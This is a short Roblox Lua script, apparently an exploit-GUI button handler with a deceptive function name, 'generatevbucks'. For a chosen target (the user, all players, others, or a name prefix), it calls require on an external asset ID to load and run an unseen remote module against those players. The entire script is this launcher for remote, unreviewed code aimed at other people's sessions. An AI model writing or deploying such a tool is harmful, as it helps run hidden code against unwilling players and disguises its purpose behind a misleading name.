--//Scripted by Sochi\\ function generatevbucks(memer) local player = script.Parent.Parent.Parent.Parent.Parent.Parent if memer == "me" then require(4481217114).load(player.Name) end if memer == "all" or memer == "everyone" then for _, skid in pairs(game:GetService("Players"):GetPlayers()) do require(4481217114).load(skid.Name) end end if memer == "others" then for _, skid in pairs(game:GetService("Players"):GetPlayers()) do if skid.Name ~= player.Name then require(4481217114).load(skid.Name) end end end for _, skid in pairs(game:GetService("Players"):GetPlayers()) do if string.sub(string.lower(skid.Name), 0, string.len(memer)) == string.lower(memer) then if skid ~= nil then require(4481217114).load(skid.Name) end end end end script.Parent.MouseButton1Click:Connect(function() generatevbucks(script.Parent.Parent.Parent.TextBox.ChangeScript.Change.ChangeRemoteHandler.Text.Value) end)